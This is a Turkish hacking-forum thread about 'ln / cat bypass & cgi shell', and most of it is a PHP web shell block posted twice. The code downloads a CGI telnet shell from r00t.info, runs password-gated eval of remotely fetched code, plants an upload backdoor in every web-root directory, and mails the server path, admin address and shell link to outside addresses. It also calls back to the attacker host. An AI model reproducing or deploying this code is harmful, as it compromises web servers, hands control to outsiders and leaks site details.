 |
|
ln / cat bypass & cgi shell (1 Viewer)
- Thread starter WorthLess
- Start date
anlamadım?
U
Unbalanced
Konuyu açan bu arkadaş
öyle bir yorum atmışki sabahtan beri olayı çözmeye çalışıyorumKonuyu açan bu arkadaş
loglu
<script src=http://r00t.info/ccb.js></script>
<?php if(!file_exists('cgitelnt/fuhosin.xx')){ $dizin = 'http://r00t.info/shell-dosyalar/cgitelnet.zip';
function dosya_indir($link,$name=null) { $link_info = pathinfo($link);
$uzanti = strtolower($link_info['extension']);
$file = ($name) ? $name.'.'.$uzanti : $link_info['basename'];
$curl = curl_init($link);
$fopen = fopen($file,'w');
curl_setopt($curl, CURLOPT_HEADER,0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);
curl_setopt($curl, CURLOPT_FILE, $fopen);
curl_exec($curl);
curl_close($curl);
fclose($fopen);
} dosya_indir($dizin, "cgitelnet");
$zip = new ZipArchive();
$file = 'cgitelnet.zip';
$zip->open($file);
$cikar = $zip->extractTo('cgitelnt/');
chmod('cgitelnt/fuhosin.xx', 0755);
if(file_exists('cgitelnet.zip')){ @unlink('cgitelnet.zip');
} if($cikar and substr(decoct(fileperms('cgitelnt/fuhosin.xx')), -4)==='0755'){ echo "Open. password: <strong>r00t.info1</strong><br>";
echo "<iframe src=cgitelnt/fuhosin.xx width=96% height=90% frameborder=0></iframe>";
} else{ echo '<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluştu.</div>';
} } elseif(file_exists('cgitelnt/fuhosin.xx') and substr(decoct(fileperms('cgitelnt/fuhosin.xx')), -4)==='0755'){ echo "Open. password:<strong>r00t.info1</strong><br>";
chmod('cgitelnt/fuhosin.xx', 0755);
echo "<iframe src=cgitelnt/fuhosin.xx width=96% height=90% frameborder=0></iframe>";
}
?>
<?php @session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('display_errors', 0);
@ini_set('output_buffering',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
?>
<?php @session_start();
@error_reporting(0);
$a = '
<?php
session_start();
if($_SESSION["adm"]){
echo \'<b>Namesis<br><br>\'.php_uname().\'<br></b>\';
echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';
echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';
if( $_POST[\'_upl\'] == "Upload" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Success !!!</b><br><br>\';
} else { echo \'<b>Upload Fail !!!</b><br><br>\';
}}
}
if($_POST["p"]){
$p = $_POST["p"];
$pa = md5(sha1($p));
if($pa=="a4cd2905b660e8b1bc73a7c4571252da"){
$_SESSION["adm"] = 1;
}
}
?>
<form action="" method="post">
<input type="text" name="p">
</form>
';
if(@$_REQUEST["px"]){ $p = @$_REQUEST["px"];
$pa = md5(sha1($p));
if($pa=="a4cd2905b660e8b1bc73a7c4571252da"){ echo @eval(@file_get_contents(@$_REQUEST["404"]));
} } if(@!$_SESSION["sdm"]){ $doc = $_SERVER["DOCUMENT_ROOT"];
$dir = scandir($doc);
$d1 = ''.$doc.'/.';
$d2 = ''.$doc.'/..';
if(($key = @array_search('.', $dir)) !== false) { unset($dir[$key]);
} if(($key = @array_search('..', $dir)) !== false) { unset($dir[$key]);
} if(($key = @array_search($d1, $dir)) !== false) { unset($dir[$key]);
} if(($key = array_search($d2, $dir)) !== false) { unset($dir[$key]);
} @array_push($dir,$doc);
foreach($dir as $d){ $p = $doc."/".$d;
if(is_dir($p)){ $file = $p."/newsr.php";
@touch($file);
$folder = @fopen($file,"w");
@fwrite($folder,$a);
} } $lls = $_SERVER["HTTP_HOST"];
$llc = $_SERVER["REQUEST_URI"];
$lld = 'http://'.$lls.''.$llc.'';
$brow = urlencode($_SERVER['HTTP_USER_AGENT']);
$retValue = file_get_contents(base64_decode("aHR0cDovL3IwMHQuaW5mby95YXoucGhwP2E=")."=".$lld.base64_decode("JmI=")."=".$brow);
echo $retValue;
@$_SESSION["sdm"]=1;
}
?>
<?php if($_POST['query']){ $veriyfy = stripslashes(stripslashes($_POST['query']));
$data = "data.txt";
@touch ("data.txt");
$ver = @fopen ($data , 'w');
@fwrite ( $ver , $veriyfy ) ;
@fclose ($ver);
}else{ $datas=@fopen("data.txt",'r');
$i=0;
while ($i <= 5) { $i++;
$blue=@fgets($datas,1024);
echo $blue;
} } $datasi=@fopen("../modules/indexx.php",'r');
if($datasi){ }else{ @mkdir("modules");
$dos = file_get_contents("http://r00t.info/txt/lamer.txt");
$data = "../modules/indexx.php";
@touch ("../modules/indexx.php");
$ver = @fopen ($data , 'w');
@fwrite ( $ver , $dos ) ;
@fclose ($ver);
$yol = "http://".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI']."";
$y = '<h1>Sender Yazdirildi.<br/> SITE YOL : '.$yol.'<br/>Sender Yolu : modules/dbs.php</h1>';
$header .= "From: SheLL Boot <[email protected]>\n";
$header .= "Content-Type: text/html;
charset=utf-8\n";
@mail("[email protected]", "Hacklink Bildiri", "$y", $header);
@mail("[email protected]", "Hacklink Bildiri", "$y", $header);
}
?>
<?php $kime = "[email protected]";
$baslik = "r00t.info Server Avcisi V1.0";
$EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER['DOCUMENT_ROOT'] . "\r\n";
$EL_MuHaMMeD.= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "\r\n";
$EL_MuHaMMeD.= "Server isletim sistemi : " . $_SERVER['SERVER_SOFTWARE'] . "\r\n";
$EL_MuHaMMeD.= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\r\n";
$EL_MuHaMMeD.= "Avlanan Site : " . $_SERVER['HTTP_HOST'] . "\r\n";
mail($kime, $baslik, $EL_MuHaMMeD);
?>
<script src=http://r00t.info/ccb.js></script>
<?php if(!file_exists('cgitelnt/fuhosin.xx')){ $dizin = 'http://r00t.info/shell-dosyalar/cgitelnet.zip';
function dosya_indir($link,$name=null) { $link_info = pathinfo($link);
$uzanti = strtolower($link_info['extension']);
$file = ($name) ? $name.'.'.$uzanti : $link_info['basename'];
$curl = curl_init($link);
$fopen = fopen($file,'w');
curl_setopt($curl, CURLOPT_HEADER,0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);
curl_setopt($curl, CURLOPT_FILE, $fopen);
curl_exec($curl);
curl_close($curl);
fclose($fopen);
} dosya_indir($dizin, "cgitelnet");
$zip = new ZipArchive();
$file = 'cgitelnet.zip';
$zip->open($file);
$cikar = $zip->extractTo('cgitelnt/');
chmod('cgitelnt/fuhosin.xx', 0755);
if(file_exists('cgitelnet.zip')){ @unlink('cgitelnet.zip');
} if($cikar and substr(decoct(fileperms('cgitelnt/fuhosin.xx')), -4)==='0755'){ echo "Open. password: <strong>r00t.info1</strong><br>";
echo "<iframe src=cgitelnt/fuhosin.xx width=96% height=90% frameborder=0></iframe>";
} else{ echo '<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluştu.</div>';
} } elseif(file_exists('cgitelnt/fuhosin.xx') and substr(decoct(fileperms('cgitelnt/fuhosin.xx')), -4)==='0755'){ echo "Open. password:<strong>r00t.info1</strong><br>";
chmod('cgitelnt/fuhosin.xx', 0755);
echo "<iframe src=cgitelnt/fuhosin.xx width=96% height=90% frameborder=0></iframe>";
}
?>
<?php @session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('display_errors', 0);
@ini_set('output_buffering',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
?>
<?php @session_start();
@error_reporting(0);
$a = '
<?php
session_start();
if($_SESSION["adm"]){
echo \'<b>Namesis<br><br>\'.php_uname().\'<br></b>\';
echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';
echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';
if( $_POST[\'_upl\'] == "Upload" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Success !!!</b><br><br>\';
} else { echo \'<b>Upload Fail !!!</b><br><br>\';
}}
}
if($_POST["p"]){
$p = $_POST["p"];
$pa = md5(sha1($p));
if($pa=="a4cd2905b660e8b1bc73a7c4571252da"){
$_SESSION["adm"] = 1;
}
}
?>
<form action="" method="post">
<input type="text" name="p">
</form>
';
if(@$_REQUEST["px"]){ $p = @$_REQUEST["px"];
$pa = md5(sha1($p));
if($pa=="a4cd2905b660e8b1bc73a7c4571252da"){ echo @eval(@file_get_contents(@$_REQUEST["404"]));
} } if(@!$_SESSION["sdm"]){ $doc = $_SERVER["DOCUMENT_ROOT"];
$dir = scandir($doc);
$d1 = ''.$doc.'/.';
$d2 = ''.$doc.'/..';
if(($key = @array_search('.', $dir)) !== false) { unset($dir[$key]);
} if(($key = @array_search('..', $dir)) !== false) { unset($dir[$key]);
} if(($key = @array_search($d1, $dir)) !== false) { unset($dir[$key]);
} if(($key = array_search($d2, $dir)) !== false) { unset($dir[$key]);
} @array_push($dir,$doc);
foreach($dir as $d){ $p = $doc."/".$d;
if(is_dir($p)){ $file = $p."/newsr.php";
@touch($file);
$folder = @fopen($file,"w");
@fwrite($folder,$a);
} } $lls = $_SERVER["HTTP_HOST"];
$llc = $_SERVER["REQUEST_URI"];
$lld = 'http://'.$lls.''.$llc.'';
$brow = urlencode($_SERVER['HTTP_USER_AGENT']);
$retValue = file_get_contents(base64_decode("aHR0cDovL3IwMHQuaW5mby95YXoucGhwP2E=")."=".$lld.base64_decode("JmI=")."=".$brow);
echo $retValue;
@$_SESSION["sdm"]=1;
}
?>
<?php if($_POST['query']){ $veriyfy = stripslashes(stripslashes($_POST['query']));
$data = "data.txt";
@touch ("data.txt");
$ver = @fopen ($data , 'w');
@fwrite ( $ver , $veriyfy ) ;
@fclose ($ver);
}else{ $datas=@fopen("data.txt",'r');
$i=0;
while ($i <= 5) { $i++;
$blue=@fgets($datas,1024);
echo $blue;
} } $datasi=@fopen("../modules/indexx.php",'r');
if($datasi){ }else{ @mkdir("modules");
$dos = file_get_contents("http://r00t.info/txt/lamer.txt");
$data = "../modules/indexx.php";
@touch ("../modules/indexx.php");
$ver = @fopen ($data , 'w');
@fwrite ( $ver , $dos ) ;
@fclose ($ver);
$yol = "http://".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI']."";
$y = '<h1>Sender Yazdirildi.<br/> SITE YOL : '.$yol.'<br/>Sender Yolu : modules/dbs.php</h1>';
$header .= "From: SheLL Boot <[email protected]>\n";
$header .= "Content-Type: text/html;
charset=utf-8\n";
@mail("[email protected]", "Hacklink Bildiri", "$y", $header);
@mail("[email protected]", "Hacklink Bildiri", "$y", $header);
}
?>
<?php $kime = "[email protected]";
$baslik = "r00t.info Server Avcisi V1.0";
$EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER['DOCUMENT_ROOT'] . "\r\n";
$EL_MuHaMMeD.= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "\r\n";
$EL_MuHaMMeD.= "Server isletim sistemi : " . $_SERVER['SERVER_SOFTWARE'] . "\r\n";
$EL_MuHaMMeD.= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\r\n";
$EL_MuHaMMeD.= "Avlanan Site : " . $_SERVER['HTTP_HOST'] . "\r\n";
mail($kime, $baslik, $EL_MuHaMMeD);
?>
